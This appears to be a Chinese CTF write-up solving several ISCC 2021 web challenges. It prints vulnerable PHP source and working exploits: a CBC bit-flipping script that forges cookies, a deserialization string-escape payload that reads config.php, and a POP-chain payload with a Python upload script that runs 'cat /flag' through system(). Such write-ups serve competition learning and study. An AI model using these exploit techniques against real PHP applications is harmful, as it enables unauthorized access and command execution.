文章目录
- 一、ISCC客服冲冲冲(一)
- 二、这是啥
- 三、Web01
- 四、ISCC客服一号冲冲冲(二)
- 五、登录
- 六、which is the true iscc
一、ISCC客服冲冲冲(一)
可以下载一个点击器,或者直接F12在html中改,right改成left,left改成right
二、这是啥
鼠标右键打开页面源代码
发现jsfuck编码,
直接将其进行解码即可得到flag
三、Web01
Why don't you take a look at robots.txt?
在后面加上robots.txt后
src表示的就是前面的url,在后面/code/code.txt
查看后发现,字符串必须小于八位,但是数字还要大于9999999,而且strpos函数会检测我们输入的password参数有没有*-*所以构造payload
?password=1e8%00*-*
四、ISCC客服一号冲冲冲(二)
查看页面源代码是发现一张图片,然后用stepsolve打开,在蓝色登录的0通道找到页面的源代码,然后学长们说是cbc翻转字节攻击,然后查阅博客
cbc翻转字节攻击
cbc翻转字节攻击
通过上传username和password
它会用我们的cookie中的iv和cipher值进行一次CBC解密,得到序列化的字符串,然后进行反序列化,得到用户名admil。
我们就是要使admil–>admin,只能通过改变cookie。password是上一题的flag
,username=admil&password=1SCC_2o2l_KeFuu,然后post传参
然后将得到的cipher用下面脚本处理
<?php
header("Content-Type: text/html;charset=utf-8");#计算cipher/*明文1:a:2:{s:8:"userna //r明文2:me";s:5:"admil"; //l字母在第14个字节明文3:s:8:"password";s明文4::15:"1SCC_2o2l_KeFuu";}*/$cipher = base64_decode(urldecode('Hqqm%2B78LQAbrOp%2FV3Dl0W4djsjPVFEqciRIQgyMwxJw%2BxobZE%2FD%2BSU4CwiZr3sQY2n2E%2BaVImSCYOnewWE1t0bW8ScjJ9zeCUvrl%2FJNFPRU%3D'));$temp = $cipher;/*设密文1[13]=A, 解密(密文2)[13]=B, 明文2[13]=C,将A修改为A ^ C,则:A ^ B = A ^ C ^ B = B ^ B = 0 = C*/// A C X$cipher[13] = chr(ord($cipher[13]) ^ ord('l') ^ ord('n'));echo urlencode(base64_encode($cipher));//echo($temp)?>
运行得到
Hqqm%2B78LQAbrOp%2FV3Dt0W4djsjPVFEqciRIQgyMwxJw%2BxobZE%2FD%2BSU4CwiZr3sQY2n2E%2BaVImSCYOnewWE1t0bW8ScjJ9zeCUvrl%2FJNFPRU%3D
将得到的cipher替换掉原来的cipher
通过base64进行解码可以看出我们的传参已经成功了,
<?php#计算iv$res = base64_decode('Rd8Rst4L4EuJACSZaD/bq21lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiIxU0NDXzJvMmxfS2VGdXUiO30='); //这里放burp放回的base64数据$iv = base64_decode(urldecode('MtcEPw9OPPHybpF5ZN7lEw%3D%3D')); //这里放cookie中的iv$plaintext = 'a:2:{s:8:"userna';$new_iv = '';for ($i = 0; $i < 16; $i ++){$new_iv = $new_iv . chr(ord($iv[$i]) ^ ord($res[$i]) ^ ord($plaintext[$i]));}echo urlencode(base64_encode($new_iv));
?>
通过这俄格脚本得到新的iv值,替换掉,再次发送得到flag
五、登录
用dirsearch扫描得到www.zip存在源码泄露。然后得到一个压缩包
源码
//index.php
<?phprequire_once('class.php');if($_SESSION['username']) {header('Location: profile.php');exit;}if($_POST['username'] && $_POST['password']) {$username = $_POST['username'];$password = $_POST['password'];if(strlen($username) < 3 or strlen($username) > 16) die('Invalid user name');if(strlen($password) < 3 or strlen($password) > 16) die('Invalid password');if($user->login($username, $password)) {$_SESSION['username'] = $username;header('Location: profile.php');exit; }else {die('Invalid user name or password');}}else {
?>
<!DOCTYPE html>
<html>
<head><title>Login</title><link href="static/bootstrap.min.css" rel="stylesheet"><script src="static/jquery.min.js"></script><script src="static/bootstrap.min.js"></script>
</head>
<body><div class="container" style="margin-top:100px"> <form action="index.php" method="post" class="well" style="width:220px;margin:0px auto;"> <img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;"><h3>Login</h3><label>Username:</label><input type="text" name="username" style="height:30px"class="span3"/><label>Password:</label><input type="password" name="password" style="height:30px" class="span3"><button type="submit" class="btn btn-primary">LOGIN</button></form></div>
</body>
</html>
<?php}
?>
//config.php
<?php$config['hostname'] = '127.0.0.1';$config['username'] = 'root';$config['password'] = '';$config['database'] = '';$flag = '';
?>//class.php
<?php
require('config.php');class user extends mysql{private $table = 'users';public function is_exists($username) {$username = parent::filter($username);$where = "username = '$username'";return parent::select($this->table, $where);}public function register($username, $password) {$username = parent::filter($username);$password = parent::filter($password);$key_list = Array('username', 'password');$value_list = Array($username, md5($password));return parent::insert($this->table, $key_list, $value_list);}public function login($username, $password) {$username = parent::filter($username);$password = parent::filter($password);$where = "username = '$username'";$object = parent::select($this->table, $where);if ($object && $object->password === md5($password)) {return true;} else {return false;}}public function show_profile($username) {$username = parent::filter($username);$where = "username = '$username'";$object = parent::select($this->table, $where);return $object->profile;}public function update_profile($username, $new_profile) {$username = parent::filter($username);$new_profile = parent::filter($new_profile);$where = "username = '$username'";return parent::update($this->table, 'profile', $new_profile, $where);}public function __tostring() {return __class__;}
}class mysql {private $link = null;public function connect($config) {$this->link = mysql_connect($config['hostname'],$config['username'], $config['password']);mysql_select_db($config['database']);mysql_query("SET sql_mode='strict_all_tables'");return $this->link;}public function select($table, $where, $ret = '*') {$sql = "SELECT $ret FROM $table WHERE $where";$result = mysql_query($sql, $this->link);return mysql_fetch_object($result);}public function insert($table, $key_list, $value_list) {$key = implode(',', $key_list);$value = '\'' . implode('\',\'', $value_list) . '\''; $sql = "INSERT INTO $table ($key) VALUES ($value)";return mysql_query($sql);}public function update($table, $key, $value, $where) {$sql = "UPDATE $table SET $key = '$value' WHERE $where";return mysql_query($sql);}public function filter($string) {$escape = array('\'', '\\\\');$escape = '/' . implode('|', $escape) . '/';$string = preg_replace($escape, '_', $string);$safe = array('select', 'insert', 'update', 'delete', 'where');$safe = '/' . implode('|', $safe) . '/i';return preg_replace($safe, 'hacker', $string);}public function __tostring() {return __class__;}
}
session_start();
$user = new user();
$user->connect($config);
<?phprequire_once('class.php');if($_SESSION['username'] == null) {die('Login First'); }$username = $_SESSION['username'];$profile=$user->show_profile($username);if($profile == null) {header('Location: update.php');}else {$profile = unserialize($profile);$phone = $profile['phone'];$email = $profile['email'];$nickname = $profile['nickname'];$photo = base64_encode(file_get_contents($profile['photo']));
?>
<!DOCTYPE html>
<html>
<head><title>Profile</title><link href="static/bootstrap.min.css" rel="stylesheet"><script src="static/jquery.min.js"></script><script src="static/bootstrap.min.js"></script>
</head>
<body><div class="container" style="margin-top:100px"> <img src="data:image/gif;base64,<?php echo $photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;"><h3>Hi <?php echo $nickname;?></h3><label>Phone: <?php echo $phone;?></label><label>Email: <?php echo $email;?></label></div>
</body>
</html>
<?php}
?>
//register.php
<?phprequire_once('class.php');if($_POST['username'] && $_POST['password']) {$username = $_POST['username'];$password = $_POST['password'];if(strlen($username) < 3 or strlen($username) > 16) die('Invalid user name');if(strlen($password) < 3 or strlen($password) > 16) die('Invalid password');if(!$user->is_exists($username)) {$user->register($username, $password);echo 'Register OK!<a href="index.php">Please Login</a>'; }else {die('User name Already Exists');}}else {
?>
<!DOCTYPE html>
<html>
<head><title>Login</title><link href="static/bootstrap.min.css" rel="stylesheet"><script src="static/jquery.min.js"></script><script src="static/bootstrap.min.js"></script>
</head>
<body><div class="container" style="margin-top:100px"> <form action="register.php" method="post" class="well" style="width:220px;margin:0px auto;"> <img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;"><h3>Register</h3><label>Username:</label><input type="text" name="username" style="height:30px"class="span3"/><label>Password:</label><input type="password" name="password" style="height:30px" class="span3"><button type="submit" class="btn btn-primary">REGISTER</button></form></div>
</body>
</html>
<?php}
?>
//update.php
<?phprequire_once('class.php');if($_SESSION['username'] == null) {die('Login First'); }if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {$username = $_SESSION['username'];if(!preg_match('/^\d{11}$/', $_POST['phone']))die('Invalid phone');if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))die('Invalid email');if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)die('Invalid nickname');$file = $_FILES['photo'];if($file['size'] < 5 or $file['size'] > 1000000)die('Photo size error');move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));$profile['phone'] = $_POST['phone'];$profile['email'] = $_POST['email'];$profile['nickname'] = $_POST['nickname'];$profile['photo'] = 'upload/' . md5($file['name']);$user->update_profile($username, serialize($profile));echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';}else {
?>
<!DOCTYPE html>
<html>
<head><title>UPDATE</title><link href="static/bootstrap.min.css" rel="stylesheet"><script src="static/jquery.min.js"></script><script src="static/bootstrap.min.js"></script>
</head>
<body><div class="container" style="margin-top:100px"> <form action="update.php" method="post" enctype="multipart/form-data" class="well" style="width:220px;margin:0px auto;"> <img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;"><h3>Please Update Your Profile</h3><label>Phone:</label><input type="text" name="phone" style="height:30px"class="span3"/><label>Email:</label><input type="text" name="email" style="height:30px"class="span3"/><label>Nickname:</label><input type="text" name="nickname" style="height:30px" class="span3"><label for="file">Photo:</label><input type="file" name="photo" style="height:30px"class="span3"/><button type="submit" class="btn btn-primary">UPDATE</button></form></div>
</body>
</html>
<?php}
?>
unserialize(str) 会忽略能够正常序列化的字符串后面的字符串。也是这到题最厉害的一点。像这样的一个字符串,我们可以可以不用反序列话,就能知道它反序列化后是什么,因为它是有规律的。
a:4:{s:5:“phone”;s:11:“11111111111”;s:5:“email”;s:11:“1a2s@qq.com”;s:8:“nickname”;s:3:“123”;s:5:“photo”;s:39:“upload/f3b94e88bd1bd325af6f62828c8785dd”;}
a:4指的是由一个数组序列化而来,并且有4个值。如果是对象的话,好像是把a改成了O。然后就是一个键值名,一个变量值:
s:5:“phone”;第一个键值名,是string类型的,长度为五,s:11:“11111111111”;第一个变量值,string类型,长度为11.这就是它的规律。如果我们在这个序列化字符串的后面,再加上一些字符,后面的字符是不会被反序列化的
代码审计,发现一个登录窗口
然后先注册了一个用户名,进行了测试。随后,修改信息。
我们构造photo的值
";}s:5:"photo";s:10:"config.php";}
因为本来6*34个字符的长度=34个where+“length(s:39:“upload/804f743824c0451b2f60d81b63b6a900”;})”,所以反序列化后, $profile[‘nicjanme’] 就等于config.php了。
payload
nikename[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
然后解码就得到flag
六、which is the true iscc
查看页面源代码
<!--
<a href="/?whatareyounongshane=src">我真的是源码?</a>
<a href="/?whatareyounongshane=cmd">干点好事!</a>
<a href="/?whatareyounongshane=upload">送点东西!</a>
<a href="/?whatareyounongshane=tellmetruth">快告诉我真相!</a>
-->
源码是250+行的代码
<?phpsession_start(); //开启session会话
ini_set('max_execution_time', '5');
set_time_limit(5); //时间限制为五秒$status = "new";
$cmd = "whoami";
$is_upload = false;
$is_unser_finished = false;
$iscc_file = NULL;class ISCC_Upload {function __wakeup() { //将在序列化之后立即被调用global $cmd;global $is_upload;$cmd = "whoami";$_SESSION['name'] = randstr(14);$is_upload = (count($_FILES) > 0);}function __destruct() { //销毁对象时调用global $is_upload;global $status;global $iscc_file;$status = "upload_fail";if ($is_upload) {foreach ($_FILES as $key => $value)$GLOBALS[$key] = $value;if(is_uploaded_file($iscc_file['tmp_name'])) {$check = @getimagesize($iscc_file["tmp_name"]);if($check !== false) {$target_dir = "/var/tmp/";$target_file = $target_dir . randstr(10);if (file_exists($target_file)) {echo "想啥呢?有东西了……<br>";finalize();exit;}if ($iscc_file["size"] > 500000) {echo "东西塞不进去~<br>";finalize();exit;}if (move_uploaded_file($iscc_file["tmp_name"], $target_file)) {echo "我拿到了!<br>";$iscc_file = $target_file;$status = "upload_ok";} else {echo "拿不到:(<br>";finalize();exit;}} else {finalize();exit;}} else {echo "你真是个天才!<br>";finalize();exit;}}}
}class ISCC_ResetCMD {protected $new_cmd = "echo '新新世界,发号施令!'";function __wakeup() {global $cmd;global $is_upload;global $status;$_SESSION['name'] = randstr(14);$is_upload = false;if(!isset($this->new_cmd)) {$status = "error";$error = "你这罐子是空的!";throw new Exception($error); }if(!is_string($this->new_cmd)) {$status = "error";$error = '东西都没给对!';throw new Exception($error);}}function __destruct() {global $cmd;global $status;$status = "reset";if($_SESSION['name'] === 'isccIsCciScc1scc') {$cmd = $this->new_cmd;}}}class ISCC_Login {function __wakeup() {$this->login();}function __destruct() {$this->logout();}function login() {$flag = file_get_contents("/flag");$pAssM0rd = hash("sha256", $flag);if($_GET['pAssM0rd'] === $pAssM0rd)$_SESSION['name'] = "isccIsCciScc1scc";}function logout() {global $status;unset($_SESSION['name']);$status = "finish";}}class ISCC_TellMeTruth {function __wakeup() {if(!isset($_SESSION['name'])) $_SESSION['name'] = randstr(14);echo "似乎这个 ".$_SESSION['name']." 是真相<br>";}function __destruct() {echo "似乎这个 ".$_SESSION['name']." 是真相<br>";}}class ISCC_Command {function __wakeup() {global $cmd;global $is_upload;$_SESSION['name'] = randstr(14);$is_upload = false;$cmd = "whoami";}function __toString() { //把对象转换为字符串,打印一个对象时被调用global $cmd;return "看看你干的好事: {$cmd} <br>";}function __destruct() {global $cmd;global $status;global $is_unser_finished;$status = "cmd";if($is_unser_finished === true) {echo "看看你干的 [<span style='color:red'>{$cmd}</span>] 弄出了什么后果: ";echo "<span style='color:blue'>";@system($cmd);echo "</span>";}}}function randstr($len)
{$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_=';$randstring = '';for ($i = 0; $i < $len; $i++) {$randstring .= $characters[rand(0, strlen($characters))];}return $randstring;
}function waf($s) {if(stripos($s, "*") !== FALSE)return false;return true;
}function finalize() {$cmd = "";$is_upload = false;unset($_SESSION);@unlink($iscc_file);$status = "finish";echo "<img src='whichisthetrueiscc.gif'><br>";
}if(isset($_GET['whatareyounongshane'])) {$whatareyounongshane = $_GET['whatareyounongshane'];switch ($whatareyounongshane) {case "src":highlight_file(__FILE__);break;case "cmd":echo "想越级干好事?还是有门的……";header('Location: /?%3f=O:12:"ISCC_Command":0:{}');break;case "reset":echo "几辈子积累的好运就在这时~:p";header('Location: /?%3f=O:13:"ISCC_ResetCMD":1:{}');break;case "upload":$resp = <<<EOF
<form action="/index.php?%3f=O:11:%22ISCC_Upload%22:0:{}" method="post" enctype="multipart/form-data"><input type="file" name="iscc_file"><input type="submit" value="Upload Image" name="submit">
</form>
EOF;echo $resp;break;case "tellmetruth":echo base64_decode("PGltZyBzcmM9J3RlbGxtZXRydXRoLmdpZic+Cg==");header('Location: /?%3f=O:14:"ISCC_TellMeTruth":0:{}');break;default:echo "空空如也就是我!";}finalize();die("所以哪个ISCC是真的?<br>");
}if(isset($_GET['?'])) {$wtf = waf($_GET{'?'}) ? $_GET['?'] : (finalize() && die("试试就“逝世”!"));if($goodshit = @unserialize($wtf)) {$is_unser_finished = true;}if(in_array($status, array('new', 'cmd', 'upload_ok', 'upload_fail', 'reset'), true))finalize();die("所以哪个ISCC是真的?<br>");
}?>
ISCC_Command类的__desturct方法,能执行命令
function __destruct() {global $cmd;global $status;global $is_unser_finished;$status = "cmd";if($is_unser_finished === true) {echo "看看你干的 [<span style=‘color:red‘>{$cmd}</span>] 弄出了什么后果: ";echo "<span style=‘color:blue‘>";@system($cmd);echo "</span>";}
$cmd在ISCC_ResetCMD类被赋值
class ISCC_ResetCMD {protected $new_cmd = "echo ‘新新世界,发号施令!‘";function __destruct() {global $cmd;global $status;$status = "reset";if($_SESSION[‘name‘] === ‘isccIsCciScc1scc‘) {$cmd = $this->new_cmd;}}}
需要session的名为isccIsCciScc1scc,一般想要控制$_SESSION的值,都是使用变量覆盖来做的 ISCC__Upload类
通过使用 PHP 的全局数组
$_FILES你可以从客户计算机向远程服务器上传文件
$GLOBALS[‘key‘] = value;全局变量的覆盖,$is_upload为true时会进行这个操作
在ISCC_Upload类的__wakeup里会被设成true:$is_upload = (count($_FILES) > 0);
但是在其他类里边都被设置成了flase,得保证在执行ISCC_Upload类的__wakeup时$is_upload为true
这就需要ISCC_Upload类的__wakeup在这些类的最后进行,但是__destruct要在第一个开始,需要按一定顺序来构造pop链
反序列化过程中魔术方法的执行顺序
__wakeup() > __toString() > __destruct()
function waf($s) {if(stripos($s, "*") !== FALSE)return false;return true;
}
php为了更加方便的进行反序列化内容的传输与显示(避免都是某些控制字符等信息),可以在序列化内容中使用大写S表示字符串,此时这个字符串就支持将后面的字符串用16进制进行表示,格式如下:
s:7:alexsel;->S:7:\61lexsel
最终:
<?php
class ISCC_Command {}
class ISCC_ResetCMD {protected $new_cmd = "cat /flag";function __construct(){$this->x=new ISCC_Command();}}
class ISCC_Upload {function __construct(){$this->y=new ISCC_ResetCMD();}
}
$b = new ISCC_Upload();
$c=urlencode(serialize($b));
$c=str_replace("s","S",$c);
$c=str_replace("%2A",‘\2a‘,$c);
echo $c;
最后用python上传
import requestsurl="http://39.96.91.106:7050/"files={‘iscc_file‘:("b",open("1.png","rb")),"_SESSION":("isccIsCciScc1scc","666")
}r=requests.post(url=url+"??=O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A1%3A%22a%22%3BO%3A13%3A%22ISCC_ReSetCMD%22%3A2%3A%7BS%3A10%3A%22%00%5C2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A1%3A%22b%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D",files=files)
print(r.text)
![构建docker镜像时,报错:ERROR: unexpected status code [manifests latest]: 403 Forbidden](https://img-blog.csdnimg.cn/4013a5cc513447329e1104f90f310762.png)
